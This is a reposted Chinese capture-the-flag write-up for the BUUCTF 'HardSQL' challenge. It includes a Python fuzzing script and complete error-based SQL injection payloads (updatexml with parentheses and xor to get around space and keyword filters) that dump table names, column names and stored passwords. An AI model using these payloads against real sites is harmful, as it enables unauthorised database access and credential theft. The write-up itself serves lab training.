buuctf | [极客大挑战 2019]HardSQL
2022/8/9 2:22:57
本文主要是介绍buuctf | [极客大挑战 2019]HardSQL,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
时间:August 8 2022
经过测试发现
- 闭合用单引号
- 过滤了空格等字符和sql关键词,用%20、%0a、/**/来绕过都不行
fuzzing一下,看有哪些关键词和字符被过滤了:
import requests with open('Sql.txt') as f: for line in f: line = line.replace('\n','') url = f'http://4eaf0972-f579-469d-8467-d2188d04562a.node4.buuoj.cn:81/check.php?username={line}&password=a' r = requests.get(url=url) if "臭弟弟" in r.text and r.status_code == 200: print(line,'、',end='')
如果无法绕过空格的话,无法执行sql。实际上除了以上绕过空格的方法,还可以用逻辑运算符(与、或、异或)结合括号()
来实现绕过空格
经测试,过滤了与运算符(
and
、&&
),还有竖线|
没有过滤或(or
)和异或运算符(xor
、^
)
在开始注入之前要注意下,提交数据是通过form表单的get方式,该方式会对数据进行url编码,例如
- 输入
%23
--> 实际结果:%25%23
- 输入
%20
--> 实际结果:%25%20
可以看出,这里的url编码和在浏览器的url框中的输入还是有区别的。浏览器的url框更加智能一些。
使用报错注入:updatexml()
表名
将下面的恶意语句在表单的用户名或密码处输入均可
a'^(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database()))),1))#
得到表名H4rDsq1
注意:所有需要用到空格的地方,可以通过括号进行包裹来绕过。
列名
a'^(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database()))),1))#
id,username,password
数据
a'xor(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))),1))#
这里flag显示不全,是因为updatexml的报错信息最多可以显示32位,我们可以用mysql的字符串函数,例如:substr()、substring()、mid()、right()、left()
a'xor(updatexml(1,concat(0x7e,(select(right(group_concat(password),31))from(H4rDsq1))),1))#
结合以上两张图片,去掉重复的部分即可得到flag
小结
过滤了空格,可以考虑使用()来代替
这篇关于buuctf | [极客大挑战 2019]HardSQL的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升